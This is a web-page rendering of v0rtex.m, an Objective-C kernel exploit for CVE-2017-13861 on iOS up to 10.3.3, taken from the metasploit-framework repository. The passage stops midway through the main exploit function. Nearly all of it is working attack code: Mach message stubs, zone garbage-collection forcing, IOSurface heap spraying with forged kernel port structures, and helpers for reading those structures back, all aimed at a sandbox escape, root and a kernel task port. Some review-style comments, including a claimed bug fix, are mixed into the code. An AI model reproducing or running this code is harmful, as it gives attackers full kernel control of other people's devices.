CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/v0rtex.m
Views: 11779
1
// v0rtex
2
// Bug by Ian Beer.
3
// Exploit by Siguza.
4
5
// Status quo:
6
// - Escapes sandbox, gets root and tfp0, should work on A7-A10 devices <=10.3.3.
7
// - Can call arbitrary kernel functions with up to 7 args via KCALL().
8
// - Relies on mach_zone_force_gc() which was removed in iOS 11, but the same
9
// effect should be achievable by continuously spraying through zones and
10
// measuring how long it takes - garbage collection usually takes ages. :P
11
// - Occasionally seems to mess with SpringBoard, i.e. apps don't open when you
12
// tap on their icons - sometimes affects only v0rtex, sometimes all of them,
13
// sometimes even freezes the lock screen. Can happen even if the exploit
14
// aborts very early on, so I'm not sure whether it's even due to that, or due
15
// to my broken UI.
16
// - Most common panic at this point is "pmap_tte_deallocate(): ... refcnt=0x1",
17
// which can occur when the app is killed, but only if shmem_addr has been
18
// faulted before. Faulting that page can _sometimes_ increase the ref count
19
// on its tte entry, which causes the mentioned panic when the task is
20
// destroyed and its pmap with it. Exact source of this is unknown, but I
21
// suspect it happening in pmap_enter_options_internal(), depending on page
22
// compression status (i.e. if the page is compressed refcnt_updated is set to
23
// true and the ref count isn't increased afterwards, otherwise it is).
24
// On 32-bit such a panic can be temporarily averted with mlock(), but that
25
// seems to cause even greater trouble later with zalloc, and on 64-bit mlock
26
// even refuses to work. Deallocating shmem_addr from our address space does
27
// not fix the problem, and neither does allocating new memory at that address
28
// and faulting into it (which should _guarantee_ that the corresponding pmap
29
// entry is updated). Fixing up the ref count manually is very tedious and
30
// still seems to cause trouble with zalloc. Calling mach_zone_force_gc()
31
// after releasing the IOSurfaceRootUserClient port seems to _somewhat_ help,
32
// as does calling sched_yield() before mach_vm_remap() and faulting the page
33
// right after, so that's what I'm doing for now.
34
// In the long term, this should really be replaced by something deterministic
35
// that _always_ works (like removing the tte entirely).
36
37
// Not sure what'll really become of this, but it's certainly not done yet.
38
// Pretty sure I'll leave iOS 11 to Ian Beer though, for the time being.
39
40
#include <errno.h> // errno
41
#include <sched.h> // sched_yield
42
#include <stdlib.h> // malloc, free
43
#include <string.h> // strerror
44
#include <unistd.h> // usleep, setuid, getuid
45
#include <mach/mach.h>
46
#include <mach-o/loader.h>
47
#include <CoreFoundation/CoreFoundation.h>
48
49
#include "common.h" // LOG, kptr_t
50
#include "v0rtex.h"
51
52
// Logging is compiled out: LOG() expands to a no-op.
// NOTE(review): common.h is included above with a "// LOG, kptr_t" comment,
// so this unconditional redefinition may clash with it — confirm intended.
// The disabled branch below was a crude debugging aid that "logged" by
// opening a file named after the formatted message; note it never closes
// the FILE* and does no bounds checking on the 1024-byte buffer.
#if 0
#define LOG(msg, ...) \
do { \
    char* buffer = malloc(1024); \
    sprintf(buffer, msg, __VA_ARGS__); \
    fopen(buffer, "w"); \
    free(buffer); \
} while (0)
#else
#define LOG(str, args...) do {} while(0)
#endif
63
64
// ********** ********** ********** get rid of ********** ********** **********
// Hardcoded structure offsets — per the section title, these should eventually
// move into the offsets_t struct passed to v0rtex().

#ifdef __LP64__
#   define OFFSET_TASK_ITK_SELF     0xd8 // offset of itk_self within struct task (see ktask_t.b below)
#   define OFFSET_IOUSERCLIENT_IPC  0x9c
#else
#   define OFFSET_TASK_ITK_SELF     0x9c
#   define OFFSET_IOUSERCLIENT_IPC  0x5c
#endif

// Size of the output buffer for IOSurface::create_surface.
#define IOSURFACE_CREATE_OUTSIZE 0x3c8 /* XXX 0x6c8 for iOS 11.0, 0xbc8 for 11.1.2 */

// ********** ********** ********** constants ********** ********** **********

#ifdef __LP64__
#   define KERNEL_MAGIC         MH_MAGIC_64 // Mach-O magic expected at the kernel header
#   define KERNEL_HEADER_OFFSET 0x4000
#else
#   define KERNEL_MAGIC         MH_MAGIC
#   define KERNEL_HEADER_OFFSET 0x1000
#endif

// KASLR slide granularity used when scanning for the kernel base.
#define KERNEL_SLIDE_STEP 0x100000

// Port-spray sizing: ports allocated before/after the target port,
// and total memory used for the IOSurface property fill.
#define NUM_BEFORE   0x2000
#define NUM_AFTER    0x1000
#define FILL_MEMSIZE 0x4000000
#if 0
#define NUM_DATA  0x4000
#define DATA_SIZE 0x1000
#endif
#ifdef __LP64__
#   define VTAB_SIZE 200
#else
#   define VTAB_SIZE 250
#endif
100
101
// IOSurfaceRootUserClient external method selectors used below.
const uint64_t IOSURFACE_CREATE_SURFACE = 0;
const uint64_t IOSURFACE_SET_VALUE      = 9;
const uint64_t IOSURFACE_GET_VALUE      = 10;
const uint64_t IOSURFACE_DELETE_VALUE   = 11;

// ipc_kobject type of a task port (IKOT_TASK).
const uint32_t IKOT_TASK = 2;

// Tags of the OSSerialize binary format consumed by the kernel's
// OSUnserializeBinary(): type in the top byte, length/count in the
// low 24 bits, bit 31 marking the last element of a collection.
enum
{
    kOSSerializeDictionary    = 0x01000000U,
    kOSSerializeArray         = 0x02000000U,
    kOSSerializeSet           = 0x03000000U,
    kOSSerializeNumber        = 0x04000000U,
    kOSSerializeSymbol        = 0x08000000U,
    kOSSerializeString        = 0x09000000U,
    kOSSerializeData          = 0x0a000000U,
    kOSSerializeBoolean       = 0x0b000000U,
    kOSSerializeObject        = 0x0c000000U,

    kOSSerializeTypeMask      = 0x7F000000U,
    kOSSerializeDataMask      = 0x00FFFFFFU,

    kOSSerializeEndCollection = 0x80000000U,

    kOSSerializeMagic         = 0x000000d3U,
};
127
128
// ********** ********** ********** macros ********** ********** **********

// Round an address down/up to an 8-byte boundary.
#define UINT64_ALIGN_DOWN(addr) ((addr) & ~7)
#define UINT64_ALIGN_UP(addr)   UINT64_ALIGN_DOWN((addr) + 7)

#if 0
// Former helper, superseded by VOLATILE_BCOPY32 below.
#define UNALIGNED_COPY(src, dst, size) \
do \
{ \
    for(volatile uint32_t *_src = (volatile uint32_t*)(src), \
                          *_dst = (volatile uint32_t*)(dst), \
                          *_end = (volatile uint32_t*)((uintptr_t)(_src) + (size)); \
        _src < _end; \
        *(_dst++) = *(_src++) \
    ); \
} while(0)
#endif

// Read a kernel pointer one 32-bit half at a time, so the access works even
// when addr is only 4-byte aligned.
#ifdef __LP64__
#   define UNALIGNED_KPTR_DEREF(addr) (((kptr_t)*(volatile uint32_t*)(addr)) | (((kptr_t)*((volatile uint32_t*)(addr) + 1)) << 32))
#else
#   define UNALIGNED_KPTR_DEREF(addr) ((kptr_t)*(volatile uint32_t*)(addr))
#endif

// memcpy equivalent done in volatile 32-bit words, so the compiler can neither
// widen nor elide the accesses. Copies whole words: a size that is not a
// multiple of 4 is effectively rounded up.
#define VOLATILE_BCOPY32(src, dst, size) \
do \
{ \
    for(volatile uint32_t *_src = (volatile uint32_t*)(src), \
                          *_dst = (volatile uint32_t*)(dst), \
                          *_end = (volatile uint32_t*)((uintptr_t)(_src) + (size)); \
        _src < _end; \
        *(_dst++) = *(_src++) \
    ); \
} while(0)

// bzero equivalent in volatile 32-bit words; same rounding caveat as above.
#define VOLATILE_BZERO32(addr, size) \
do \
{ \
    for(volatile uint32_t *_ptr = (volatile uint32_t*)(addr), \
                          *_end = (volatile uint32_t*)((uintptr_t)(_ptr) + (size)); \
        _ptr < _end; \
        *(_ptr++) = 0 \
    ); \
} while(0)

// Destroy a port right in our IPC space and null the variable so cleanup code
// can't touch it twice. Relies on a variable named "self" (the task port)
// being in scope at the expansion site.
#define RELEASE_PORT(port) \
do \
{ \
    if(MACH_PORT_VALID((port))) \
    { \
        _kernelrpc_mach_port_destroy_trap(self, (port)); \
        port = MACH_PORT_NULL; \
    } \
} while(0)
182
183
// ********** ********** ********** IOKit ********** ********** **********
184
185
typedef mach_port_t io_service_t;
186
typedef mach_port_t io_connect_t;
187
extern const mach_port_t kIOMasterPortDefault;
188
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
189
io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
190
kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *client);
191
kern_return_t IOServiceClose(io_connect_t client);
192
kern_return_t IOConnectCallStructMethod(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
193
kern_return_t IOConnectCallAsyncStructMethod(mach_port_t connection, uint32_t selector, mach_port_t wake_port, uint64_t *reference, uint32_t referenceCnt, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt);
194
kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);
195
196
// ********** ********** ********** other unexported symbols ********** ********** **********
197
198
kern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);
199
200
// ********** ********** ********** helpers ********** ********** **********
201
202
// Turn an errno-style value into a printable string, mapping 0 to the
// literal "success" rather than whatever strerror(0) yields.
static const char *errstr(int r)
{
    if(r == 0)
    {
        return "success";
    }
    return strerror(r);
}
206
207
// Encode val in base 255 (one digit per byte) and add 0x01010101, producing
// a value with no zero bytes — usable as an inband IOSurface property key
// where a zero byte would terminate the string.
static uint32_t transpose(uint32_t val)
{
    uint32_t enc = 0;
    size_t shift = 0;
    while(val > 0)
    {
        enc += (val % 255) << shift;
        val /= 255;
        shift += 8;
    }
    return enc + 0x01010101;
}
217
218
// ********** ********** ********** MIG ********** ********** **********
219
220
// Hand-rolled MIG stub for mach_zone_force_gc() (host message id 221), which
// has no public prototype. Asks the kernel to garbage-collect empty zone
// pages, pushing freed zone elements back to the VM layer.
static kern_return_t my_mach_zone_force_gc(host_t host)
{
#pragma pack(4)
    typedef struct {
        mach_msg_header_t Head;
    } Request;
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_msg_trailer_t trailer;
    } Reply;
#pragma pack()

    union {
        Request In;
        Reply Out;
    } msg;

    Request *req = &msg.In;
    Reply *rep = &msg.Out;

    // 19 == MACH_MSG_TYPE_COPY_SEND for the remote (host) port.
    req->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    req->Head.msgh_remote_port = host;
    req->Head.msgh_local_port = mig_get_reply_port();
    req->Head.msgh_id = 221;
    req->Head.msgh_reserved = 0;

    kern_return_t ret = mach_msg(&req->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), req->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if(ret == KERN_SUCCESS)
    {
        // Transport succeeded — surface the server-side return code.
        ret = rep->RetCode;
    }
    return ret;
}
255
256
// Hand-rolled MIG stub for mach_port_get_context() (message id 3228).
// On success, stores the port's 64-bit context value into *context.
static kern_return_t my_mach_port_get_context(task_t task, mach_port_name_t name, mach_vm_address_t *context)
{
#pragma pack(4)
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        mach_port_name_t name;
    } Request;
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_vm_address_t context;
        mach_msg_trailer_t trailer;
    } Reply;
#pragma pack()

    union {
        Request In;
        Reply Out;
    } msg;

    Request *req = &msg.In;
    Reply *rep = &msg.Out;

    req->NDR = NDR_record;
    req->name = name;
    // 19 == MACH_MSG_TYPE_COPY_SEND for the remote (task) port.
    req->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    req->Head.msgh_remote_port = task;
    req->Head.msgh_local_port = mig_get_reply_port();
    req->Head.msgh_id = 3228;
    req->Head.msgh_reserved = 0;

    kern_return_t ret = mach_msg(&req->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), req->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if(ret == KERN_SUCCESS)
    {
        ret = rep->RetCode;
    }
    if(ret == KERN_SUCCESS)
    {
        *context = rep->context;
    }
    return ret;
}
300
301
// Hand-rolled MIG stub for mach_port_set_context() (message id 3229).
// Sets the 64-bit context value on the named port right.
// (Deliberately non-static: other translation units use it.)
kern_return_t my_mach_port_set_context(task_t task, mach_port_name_t name, mach_vm_address_t context)
{
#pragma pack(4)
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        mach_port_name_t name;
        mach_vm_address_t context;
    } Request;
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_msg_trailer_t trailer;
    } Reply;
#pragma pack()

    union {
        Request In;
        Reply Out;
    } msg;

    Request *req = &msg.In;
    Reply *rep = &msg.Out;

    req->NDR = NDR_record;
    req->name = name;
    req->context = context;
    // 19 == MACH_MSG_TYPE_COPY_SEND for the remote (task) port.
    req->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    req->Head.msgh_remote_port = task;
    req->Head.msgh_local_port = mig_get_reply_port();
    req->Head.msgh_id = 3229;
    req->Head.msgh_reserved = 0;

    kern_return_t ret = mach_msg(&req->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), req->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if(ret == KERN_SUCCESS)
    {
        ret = rep->RetCode;
    }
    return ret;
}
342
343
// Raw MIG function for a merged IOSurface deleteValue + setValue call, attempting to increase performance.
344
// Prepare everything - sched_yield() - fire.
345
static kern_return_t reallocate_buf(io_connect_t client, uint32_t surfaceId, uint32_t propertyId, void *buf, mach_vm_size_t len)
346
{
347
#pragma pack(4)
348
typedef struct {
349
mach_msg_header_t Head;
350
NDR_record_t NDR;
351
uint32_t selector;
352
mach_msg_type_number_t scalar_inputCnt;
353
mach_msg_type_number_t inband_inputCnt;
354
uint32_t inband_input[4];
355
mach_vm_address_t ool_input;
356
mach_vm_size_t ool_input_size;
357
mach_msg_type_number_t inband_outputCnt;
358
mach_msg_type_number_t scalar_outputCnt;
359
mach_vm_address_t ool_output;
360
mach_vm_size_t ool_output_size;
361
} DeleteRequest;
362
typedef struct {
363
mach_msg_header_t Head;
364
NDR_record_t NDR;
365
uint32_t selector;
366
mach_msg_type_number_t scalar_inputCnt;
367
mach_msg_type_number_t inband_inputCnt;
368
mach_vm_address_t ool_input;
369
mach_vm_size_t ool_input_size;
370
mach_msg_type_number_t inband_outputCnt;
371
mach_msg_type_number_t scalar_outputCnt;
372
mach_vm_address_t ool_output;
373
mach_vm_size_t ool_output_size;
374
} SetRequest;
375
typedef struct {
376
mach_msg_header_t Head;
377
NDR_record_t NDR;
378
kern_return_t RetCode;
379
mach_msg_type_number_t inband_outputCnt;
380
char inband_output[4096];
381
mach_msg_type_number_t scalar_outputCnt;
382
uint64_t scalar_output[16];
383
mach_vm_size_t ool_output_size;
384
mach_msg_trailer_t trailer;
385
} Reply;
386
#pragma pack()
387
388
// Delete
389
union {
390
DeleteRequest In;
391
Reply Out;
392
} DMess;
393
394
DeleteRequest *DInP = &DMess.In;
395
Reply *DOutP = &DMess.Out;
396
397
DInP->NDR = NDR_record;
398
DInP->selector = IOSURFACE_DELETE_VALUE;
399
DInP->scalar_inputCnt = 0;
400
401
DInP->inband_input[0] = surfaceId;
402
DInP->inband_input[2] = transpose(propertyId);
403
DInP->inband_input[3] = 0x0; // Null terminator
404
DInP->inband_inputCnt = sizeof(DInP->inband_input);
405
406
DInP->ool_input = 0;
407
DInP->ool_input_size = 0;
408
409
DInP->inband_outputCnt = sizeof(uint32_t);
410
DInP->scalar_outputCnt = 0;
411
DInP->ool_output = 0;
412
DInP->ool_output_size = 0;
413
414
DInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
415
DInP->Head.msgh_remote_port = client;
416
DInP->Head.msgh_local_port = mig_get_reply_port();
417
DInP->Head.msgh_id = 2865;
418
DInP->Head.msgh_reserved = 0;
419
420
// Set
421
union {
422
SetRequest In;
423
Reply Out;
424
} SMess;
425
426
SetRequest *SInP = &SMess.In;
427
Reply *SOutP = &SMess.Out;
428
429
SInP->NDR = NDR_record;
430
SInP->selector = IOSURFACE_SET_VALUE;
431
SInP->scalar_inputCnt = 0;
432
433
SInP->inband_inputCnt = 0;
434
435
SInP->ool_input = (mach_vm_address_t)buf;
436
SInP->ool_input_size = len;
437
438
SInP->inband_outputCnt = sizeof(uint32_t);
439
SInP->scalar_outputCnt = 0;
440
SInP->ool_output = 0;
441
SInP->ool_output_size = 0;
442
443
SInP->Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
444
SInP->Head.msgh_remote_port = client;
445
SInP->Head.msgh_local_port = mig_get_reply_port();
446
SInP->Head.msgh_id = 2865;
447
SInP->Head.msgh_reserved = 0;
448
449
// Deep breath
450
sched_yield();
451
452
// Fire
453
kern_return_t ret = mach_msg(&DInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(DeleteRequest), (mach_msg_size_t)sizeof(Reply), DInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
454
if(ret == KERN_SUCCESS)
455
{
456
ret = DOutP->RetCode;
457
}
458
if(ret != KERN_SUCCESS)
459
{
460
return ret;
461
}
462
ret = mach_msg(&SInP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, sizeof(SetRequest), (mach_msg_size_t)sizeof(Reply), SInP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
463
if(ret == KERN_SUCCESS)
464
{
465
ret = SOutP->RetCode;
466
}
467
return ret;
468
}
469
470
// ********** ********** ********** data structures ********** ********** **********
471
472
#ifdef __LP64__
473
typedef volatile struct
474
{
475
kptr_t prev;
476
kptr_t next;
477
kptr_t start;
478
kptr_t end;
479
} kmap_hdr_t;
480
#endif
481
482
typedef volatile struct {
483
uint32_t ip_bits;
484
uint32_t ip_references;
485
struct {
486
kptr_t data;
487
uint32_t type;
488
#ifdef __LP64__
489
uint32_t pad;
490
#endif
491
} ip_lock; // spinlock
492
struct {
493
struct {
494
struct {
495
uint32_t flags;
496
uint32_t waitq_interlock;
497
uint64_t waitq_set_id;
498
uint64_t waitq_prepost_id;
499
struct {
500
kptr_t next;
501
kptr_t prev;
502
} waitq_queue;
503
} waitq;
504
kptr_t messages;
505
uint32_t seqno;
506
uint32_t receiver_name;
507
uint16_t msgcount;
508
uint16_t qlimit;
509
#ifdef __LP64__
510
uint32_t pad;
511
#endif
512
} port;
513
kptr_t klist;
514
} ip_messages;
515
kptr_t ip_receiver;
516
kptr_t ip_kobject;
517
kptr_t ip_nsrequest;
518
kptr_t ip_pdrequest;
519
kptr_t ip_requests;
520
kptr_t ip_premsg;
521
uint64_t ip_context;
522
uint32_t ip_flags;
523
uint32_t ip_mscount;
524
uint32_t ip_srights;
525
uint32_t ip_sorights;
526
} kport_t;
527
528
typedef volatile struct {
529
union {
530
kptr_t port;
531
uint32_t index;
532
} notify;
533
union {
534
uint32_t name;
535
kptr_t size;
536
} name;
537
} kport_request_t;
538
539
typedef volatile union
540
{
541
struct {
542
struct {
543
kptr_t data;
544
uint32_t reserved : 24,
545
type : 8;
546
#ifdef __LP64__
547
uint32_t pad;
548
#endif
549
} lock; // mutex lock
550
uint32_t ref_count;
551
uint32_t active;
552
uint32_t halting;
553
#ifdef __LP64__
554
uint32_t pad;
555
#endif
556
kptr_t map;
557
} a;
558
struct {
559
char pad[OFFSET_TASK_ITK_SELF];
560
kptr_t itk_self;
561
} b;
562
} ktask_t;
563
564
// ********** ********** ********** more helper functions because it turns out we need access to data structures... sigh ********** ********** **********
565
566
// Plant a crafted kport_t inside the sprayed IOSurface property buffer and
// reallocate the corresponding page(s) via reallocate_buf().
//
// off is the fake port's offset within the sprayed page; the page payload
// lives at &buf[9] (after the 9-word dict_small header). If the port
// straddles a page boundary, its tail is placed at the start of the payload
// and the next page's property is resprayed with the same buffer too.
//
// BUGFIX: the straddling branch previously copied sizeof(kport_t) - off
// bytes for the second fragment. In that branch off > pagesize -
// sizeof(kport_t), so the subtraction underflows and VOLATILE_BCOPY32 would
// run far out of bounds. The remaining byte count after copying
// (pagesize - off) bytes is sizeof(kport_t) - (pagesize - off) — the same
// math readback_fakeport uses for the reverse direction.
static kern_return_t reallocate_fakeport(io_connect_t client, uint32_t surfaceId, uint32_t pageId, uint64_t off, mach_vm_size_t pagesize, kport_t *kport, uint32_t *buf, mach_vm_size_t len)
{
    bool twice = false;
    if(off + sizeof(kport_t) > pagesize)
    {
        twice = true;
        // Head fragment fills the tail of this page...
        VOLATILE_BCOPY32(kport, (void*)((uintptr_t)&buf[9] + off), pagesize - off);
        // ...and the remainder goes at the start of the next page's payload.
        VOLATILE_BCOPY32((void*)((uintptr_t)kport + (pagesize - off)), &buf[9], sizeof(kport_t) - (pagesize - off));
    }
    else
    {
        VOLATILE_BCOPY32(kport, (void*)((uintptr_t)&buf[9] + off), sizeof(kport_t));
    }
    buf[6] = transpose(pageId); // key slot of the dict_small template
    kern_return_t ret = reallocate_buf(client, surfaceId, pageId, buf, len);
    if(twice && ret == KERN_SUCCESS)
    {
        // Respray the following page with the next key.
        ++pageId;
        buf[6] = transpose(pageId);
        ret = reallocate_buf(client, surfaceId, pageId, buf, len);
    }
    return ret;
}
589
590
// Read the fake port's current contents back out of the sprayed IOSurface
// property into *kport, fetching a second page if the port straddles a page
// boundary. request/resp are caller-provided getValue buffers; the payload
// starts at resp[4]. Returns KERN_FAILURE if the kernel returned fewer
// bytes than expected.
kern_return_t readback_fakeport(io_connect_t client, uint32_t pageId, uint64_t off, mach_vm_size_t pagesize, uint32_t *request, size_t reqsize, uint32_t *resp, size_t respsz, kport_t *kport)
{
    request[2] = transpose(pageId);
    size_t outsz = respsz;
    kern_return_t ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, reqsize, resp, &outsz);
    LOG("getValue(%u): 0x%lx bytes, %s", pageId, outsz, mach_error_string(ret));
    if(ret == KERN_SUCCESS && outsz == respsz)
    {
        // First (possibly only) fragment, clamped to the tail of this page.
        size_t chunk = pagesize - off;
        if(chunk > sizeof(kport_t))
        {
            chunk = sizeof(kport_t);
        }
        VOLATILE_BCOPY32((void*)((uintptr_t)&resp[4] + off), kport, chunk);
        if(chunk < sizeof(kport_t))
        {
            // Port straddles a page boundary — the rest sits at the start
            // of the next page's property value.
            ++pageId;
            request[2] = transpose(pageId);
            outsz = respsz;
            ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, reqsize, resp, &outsz);
            LOG("getValue(%u): 0x%lx bytes, %s", pageId, outsz, mach_error_string(ret));
            if(ret == KERN_SUCCESS && outsz == respsz)
            {
                VOLATILE_BCOPY32(&resp[4], (void*)((uintptr_t)kport + chunk), sizeof(kport_t) - chunk);
            }
        }
    }
    if(ret == KERN_SUCCESS && outsz < respsz)
    {
        LOG("%s", "Response too short.");
        ret = KERN_FAILURE;
    }
    return ret;
}
624
625
// ********** ********** ********** ye olde pwnage ********** ********** **********
626
627
kern_return_t v0rtex(offsets_t *off, mach_port_t* tfp0, uint64_t* kernelbase)
628
{
629
kern_return_t retval = KERN_FAILURE,
630
ret = 0;
631
task_t self = mach_task_self();
632
host_t host = mach_host_self();
633
634
io_connect_t client = MACH_PORT_NULL;
635
mach_port_t stuffport = MACH_PORT_NULL;
636
mach_port_t realport = MACH_PORT_NULL;
637
mach_port_t before[NUM_BEFORE] = { MACH_PORT_NULL };
638
mach_port_t port = MACH_PORT_NULL;
639
mach_port_t after[NUM_AFTER] = { MACH_PORT_NULL };
640
mach_port_t fakeport = MACH_PORT_NULL;
641
mach_vm_size_t pagesize = 0,
642
shmemsz = 0;
643
uint32_t *dict_prep = NULL,
644
*dict_big = NULL,
645
*dict_small = NULL,
646
*resp = NULL;
647
mach_vm_address_t shmem_addr = 0;
648
mach_port_array_t maps = NULL;
649
650
/********** ********** data hunting ********** **********/
651
652
vm_size_t pgsz = 0;
653
ret = _host_page_size(host, &pgsz);
654
pagesize = pgsz;
655
LOG("page size: 0x%llx, %s", pagesize, mach_error_string(ret));
656
if(ret != KERN_SUCCESS)
657
{
658
goto out;
659
}
660
661
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
662
LOG("service: %x", service);
663
if(!MACH_PORT_VALID(service))
664
{
665
goto out;
666
}
667
668
ret = IOServiceOpen(service, self, 0, &client);
669
LOG("client: %x, %s", client, mach_error_string(ret));
670
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(client))
671
{
672
goto out;
673
}
674
675
uint32_t dict_create[] =
676
{
677
kOSSerializeMagic,
678
kOSSerializeEndCollection | kOSSerializeDictionary | 1,
679
680
kOSSerializeSymbol | 19,
681
0x75534f49, 0x63616672, 0x6c6c4165, 0x6953636f, 0x657a, // "IOSurfaceAllocSize"
682
kOSSerializeEndCollection | kOSSerializeNumber | 32,
683
0x1000,
684
0x0,
685
};
686
union
687
{
688
char _padding[IOSURFACE_CREATE_OUTSIZE];
689
struct
690
{
691
mach_vm_address_t addr1;
692
mach_vm_address_t addr2;
693
uint32_t id;
694
} data;
695
} surface;
696
VOLATILE_BZERO32(&surface, sizeof(surface));
697
size_t size = sizeof(surface);
698
ret = IOConnectCallStructMethod(client, IOSURFACE_CREATE_SURFACE, dict_create, sizeof(dict_create), &surface, &size);
699
LOG("newSurface: %s", mach_error_string(ret));
700
if(ret != KERN_SUCCESS)
701
{
702
goto out;
703
}
704
LOG("surface ID: 0x%x", surface.data.id);
705
706
/********** ********** data preparation ********** **********/
707
708
size_t num_data = FILL_MEMSIZE / pagesize,
709
dictsz_prep = (5 + 4 * num_data) * sizeof(uint32_t),
710
dictsz_big = dictsz_prep + (num_data * pagesize),
711
dictsz_small = 9 * sizeof(uint32_t) + pagesize,
712
respsz = 4 * sizeof(uint32_t) + pagesize;
713
dict_prep = malloc(dictsz_prep);
714
if(!dict_prep)
715
{
716
LOG("malloc(prep): %s", strerror(errno));
717
goto out;
718
}
719
dict_big = malloc(dictsz_big);
720
if(!dict_big)
721
{
722
LOG("malloc(big): %s", strerror(errno));
723
goto out;
724
}
725
dict_small = malloc(dictsz_small);
726
if(!dict_small)
727
{
728
LOG("malloc(small): %s", strerror(errno));
729
goto out;
730
}
731
resp = malloc(respsz);
732
if(!resp)
733
{
734
LOG("malloc(resp): %s", strerror(errno));
735
goto out;
736
}
737
VOLATILE_BZERO32(dict_prep, dictsz_prep);
738
VOLATILE_BZERO32(dict_big, dictsz_big);
739
VOLATILE_BZERO32(dict_small, dictsz_small);
740
VOLATILE_BZERO32(resp, respsz);
741
742
// ipc.ports zone uses 0x3000 allocation chunks, but hardware page size before A9
743
// is actually 0x1000, so references to our reallocated memory may be shifted
744
// by (0x1000 % sizeof(kport_t))
745
kport_t triple_kport;
746
VOLATILE_BZERO32(&triple_kport, sizeof(triple_kport));
747
triple_kport.ip_lock.data = 0x0;
748
triple_kport.ip_lock.type = 0x11;
749
#ifdef __LP64__
750
triple_kport.ip_messages.port.waitq.waitq_queue.next = 0x0;
751
triple_kport.ip_messages.port.waitq.waitq_queue.prev = 0x11;
752
triple_kport.ip_nsrequest = 0x0;
753
triple_kport.ip_pdrequest = 0x11;
754
#endif
755
756
uint32_t *prep = dict_prep;
757
uint32_t *big = dict_big;
758
*(big++) = *(prep++) = surface.data.id;
759
*(big++) = *(prep++) = 0x0;
760
*(big++) = *(prep++) = kOSSerializeMagic;
761
*(big++) = *(prep++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
762
*(big++) = *(prep++) = kOSSerializeEndCollection | kOSSerializeDictionary | num_data;
763
for(size_t i = 0; i < num_data; ++i)
764
{
765
*(big++) = *(prep++) = kOSSerializeSymbol | 5;
766
*(big++) = *(prep++) = transpose(i);
767
*(big++) = *(prep++) = 0x0; // null terminator
768
*(big++) = (i + 1 >= num_data ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
769
size_t j = 0;
770
for(uintptr_t ptr = (uintptr_t)big, end = ptr + pagesize; ptr < end; ptr += sizeof(triple_kport))
771
{
772
size_t sz = end - ptr;
773
if(sz > sizeof(triple_kport))
774
{
775
sz = sizeof(triple_kport);
776
}
777
triple_kport.ip_context = (0x10000000ULL | (j << 20) | i) << 32;
778
#ifdef __LP64__
779
triple_kport.ip_messages.port.pad = 0x20000000 | (j << 20) | i;
780
triple_kport.ip_lock.pad = 0x30000000 | (j << 20) | i;
781
#endif
782
VOLATILE_BCOPY32(&triple_kport, ptr, sz);
783
++j;
784
}
785
big += (pagesize / sizeof(uint32_t));
786
*(prep++) = (i + 1 >= num_data ? kOSSerializeEndCollection : 0) | kOSSerializeBoolean | 1;
787
}
788
789
dict_small[0] = surface.data.id;
790
dict_small[1] = 0x0;
791
dict_small[2] = kOSSerializeMagic;
792
